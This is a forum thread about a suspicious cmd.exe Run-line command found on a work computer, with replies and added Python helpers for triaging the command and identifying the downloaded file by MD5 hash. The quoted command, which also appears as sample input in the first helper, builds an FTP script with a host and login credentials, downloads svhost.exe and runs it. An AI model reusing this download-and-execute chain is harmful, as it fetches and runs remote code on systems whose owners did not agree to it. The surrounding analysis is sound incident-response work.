
English please?


3TeK

So I jumped on one of my computers at work today and went to Start > Run, and I see this in the Run line:

cmd /c echo open ftp.r3kot.com 21 >> ik &echo user active@r3kot.com ;jwtc9lV?i{- >> ik &echo binary >> ik &echo get svhost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svhost.exe &exit

Anyone got any ideas what that did exactly? I figured it got hacked, so I wiped the computer and put Linux on there, lol.

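As an added example (not code from anyone in this thread), here is a small Python triage helper for a run-line command of the shape quoted in the first post. It splits the cmd.exe `&` chain, reassembles the FTP script that the `echo ... >> file` segments build, and records the indicators a responder would want to note: the FTP server and port, the account name (a password is flagged as present but not copied out), the file fetched, whether that file is then executed, and whether the script is deleted afterwards. The sample input is the command from the post; the class, function and field names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: the run-line command quoted in the first post.
SAMPLE_RUN_LINE = (
    "cmd /c echo open ftp.r3kot.com 21 >> ik &echo user active@r3kot.com ;jwtc9lV?i{- >> ik "
    "&echo binary >> ik &echo get svhost.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &svhost.exe &exit"
)

# Segment shapes we recognise: 'echo <text> >> <file>' and 'ftp ... -s:<file>'.
ECHO_REDIRECT = re.compile(r"^echo\s+(?P<text>.*?)\s*>>\s*(?P<file>\S+)$", re.IGNORECASE)
FTP_SCRIPT = re.compile(r"^ftp\b.*-s:(?P<file>\S+)", re.IGNORECASE)


@dataclass
class FtpDropperIndicators:
    """What a responder would record from an FTP-script download-and-run one-liner."""
    script_file: Optional[str] = None
    ftp_host: Optional[str] = None
    ftp_port: Optional[int] = None
    ftp_user: Optional[str] = None
    has_password: bool = False          # password is noted, never copied out
    fetched_files: List[str] = field(default_factory=list)
    executed_files: List[str] = field(default_factory=list)
    deletes_script: bool = False

    @property
    def is_ftp_dropper(self) -> bool:
        return bool(self.script_file and self.ftp_host and self.fetched_files)

    @property
    def runs_downloaded_file(self) -> bool:
        return any(f in self.fetched_files for f in self.executed_files)


def split_cmd_chain(cmdline: str) -> List[str]:
    """Split a cmd.exe command on '&' and drop the leading 'cmd /c' wrapper.
    Assumption: no '&&', '||', quoting or %VAR% expansion is involved."""
    parts = [p.strip() for p in cmdline.split("&")]
    if parts and parts[0].lower().startswith("cmd "):
        parts[0] = re.sub(r"^cmd\s+/c\s+", "", parts[0], flags=re.IGNORECASE)
    return [p for p in parts if p]


def analyze_run_line(cmdline: str) -> FtpDropperIndicators:
    ind = FtpDropperIndicators()
    scripts: Dict[str, List[str]] = {}   # script file name -> lines echoed into it

    for seg in split_cmd_chain(cmdline):
        m = ECHO_REDIRECT.match(seg)
        if m:
            scripts.setdefault(m.group("file"), []).append(m.group("text"))
            continue
        m = FTP_SCRIPT.match(seg)
        if m:
            ind.script_file = m.group("file")
            continue
        tokens = seg.split()
        if tokens[0].lower() == "exit":
            continue
        if tokens[0].lower() == "del" and len(tokens) > 1 and tokens[1] == ind.script_file:
            ind.deletes_script = True
            continue
        # Anything else in the chain is treated as a program being launched.
        ind.executed_files.append(tokens[0])

    # Interpret the script that ftp -s: actually ran.
    for line in scripts.get(ind.script_file or "", []):
        verb, *args = line.split()
        verb = verb.lower()
        if verb == "open" and args:
            ind.ftp_host = args[0]
            ind.ftp_port = int(args[1]) if len(args) > 1 and args[1].isdigit() else 21
        elif verb == "user" and args:
            ind.ftp_user = args[0]
            ind.has_password = len(args) > 1
        elif verb in ("get", "mget") and args:
            ind.fetched_files.extend(args)
    return ind


if __name__ == "__main__":
    print(analyze_run_line(SAMPLE_RUN_LINE))
```

The parser deliberately covers only the `&` chain and `>>` redirection seen here; anything it does not recognise as echo, ftp, del or exit is reported as a launched program, so a benign `dir` would also show up in `executed_files`. The `is_ftp_dropper` and `runs_downloaded_file` flags are what to key a detection on: a script file written by echo, handed to `ftp -s:`, a `get`, and the fetched name launched in the same chain.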

Whoever it was, was dumb enough not to erase their tracks if they did it from the Run prompt. I'm sure it can be narrowed down to specific people at your work. Also, the fact that they were downloading malware means they intended to do something to your company; you should bring it to the attention of your boss as well as security (if you have any) and make sure they know it wasn't you who did it, since it was on the machine you sit at and you could be blamed for it!

Just scanned it at VT, and it found nothing: http://www.virustotal.com/analisis/c12911d...1893-1247962693

Maybe they changed the file from the one sparda grabbed.

Inspecting it more, it looks like a packed Firefox with changed icons to look like a Microsoft installer, but that could be someone trying to make it look like something else. This is what I see in the file: http://www.twistedpairrecords.com/digip/svchost-ftp.jpg

And Google returns similar results for Firefox installers: http://www.google.com/search?hl=en&q=f...G=Google+Search

Edit: The MD5 hash confirms it is Firefox saved as svchost.exe:

0d39ccd077bc5fec7fccf063a6bc0e9b ./win32/en-GB/Firefox Setup 3.5.1.exe

http://releases.mozilla.org/pub/mozilla.or...est-3.5/MD5SUMS

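The hash check above, as an added Python example (my code, not the poster's): parse a MD5SUMS-style listing, hash the suspect file, and look it up by digest so the file is identified by content regardless of the name it was saved under. The listing embedded here is constructed: its first line is the Firefox 3.5.1 entry quoted in the post, the second is an invented entry whose digest is md5(b"abc"); the demo writes a throwaway file containing `abc` under the name `svhost.exe` and identifies it. The two-space separator is assumed from the quoted line.

```python
import hashlib
import os
import tempfile
from typing import Dict, Optional

# Constructed MD5SUMS excerpt (see lead-in). Format assumed: '<md5>  <path>'.
SAMPLE_MD5SUMS = """\
0d39ccd077bc5fec7fccf063a6bc0e9b  ./win32/en-GB/Firefox Setup 3.5.1.exe
900150983cd24fb0d6963f7d28e17f72  ./constructed/example-installer.exe
"""


def parse_md5sums(text: str) -> Dict[str, str]:
    """Map lowercase md5 hex digest -> listed path, skipping blank and comment lines."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, path = line.partition("  ")   # paths may contain single spaces
        if len(digest) == 32 and path:
            table[digest.lower()] = path.strip()
    return table


def md5_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file through MD5 so large installers do not have to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def identify_by_hash(path: str, sums: Dict[str, str]) -> Optional[str]:
    """Return the listed path whose digest matches the file, or None if unknown."""
    return sums.get(md5_of_file(path))


def demo() -> Optional[str]:
    """Write a constructed 'svhost.exe' and identify it purely by its digest."""
    sums = parse_md5sums(SAMPLE_MD5SUMS)
    with tempfile.TemporaryDirectory() as d:
        suspect = os.path.join(d, "svhost.exe")
        with open(suspect, "wb") as f:
            f.write(b"abc")
        return identify_by_hash(suspect, sums)


if __name__ == "__main__":
    print(demo())
```

A match against a vendor's published sums tells you what the file is; it does not tell you why someone staged it under a system-looking name, which is the part worth escalating. MD5 is fine for recognising a known distribution file this way, but for anything adversarial (an attacker who controls both files) prefer the vendor's SHA-256 sums where they publish them.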

Thanks for all the info, I really appreciate the help.

It's a computer at our data center that one of the other guys uses, and my office is across the street, so I'm hardly ever there. Plus, I'm smarter than to leave the command line there, lol.

